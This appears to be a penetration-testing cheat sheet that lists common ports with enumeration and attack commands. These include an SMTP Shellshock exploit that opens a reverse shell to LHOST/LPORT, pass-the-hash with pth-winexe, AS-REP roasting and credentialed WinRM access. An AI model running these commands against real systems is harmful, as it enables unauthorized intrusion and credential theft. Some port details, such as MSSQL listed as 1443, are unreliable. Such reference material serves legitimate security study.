HIFG_Ports

COMMON PORTS AND USES

PORTS / ASSOCIATED COMMANDS / TARGET PROTOCOL

PortCommandsTarget
21FTP
Try anonymous logins
ftp [email protected]
25SMTP
telnet 10.10.10.10 25
VRFY user
FINISH SESSION: Ctl + ] / close
VULN SHELLSHOCK – need valid email addres:
python2 postfix-shellshock-nc.py 10.10.10.10 [email protected] LHOST LPORT
110POP
143IMAP
587SECURE EMAIL
80 / 443WEB
Dirb / Dirbuster / Gobuster / Nikto / Curl
RFI / LFI / SQLI
88 / 464KERBEROS
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
111NFS
showmount -a / -e
135RPC
impacket-rpcdump
139 / 445SMB
nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script smb-vuln* <ip>
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux
VERSIONS FOR ANALYSIS:
CIFS (OLD WIND NT 4.0)
SMB 1.0 / SMB1 – WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2
SMB 2.0 / SMB2 – WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 – WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 – WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 – WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) – WIN SRV 2016 / WIN 10
1443MSSQL
nmap --script ms-sql* -p1433
sqsh -S 10.11.1.31 -U sa
3306MYSQL
mysql -u <user> -p <pass>
show databases;
show tables;
389 / 3268LDAP
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220
impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
3389RDP
rdesktop -u <user> -p <pass> <host>
5985 / 5986WINRM
evil-winrm -u <user> -p <pass> -i <host>
BACK TO HOMEREFERENCE PAGE
Scroll to top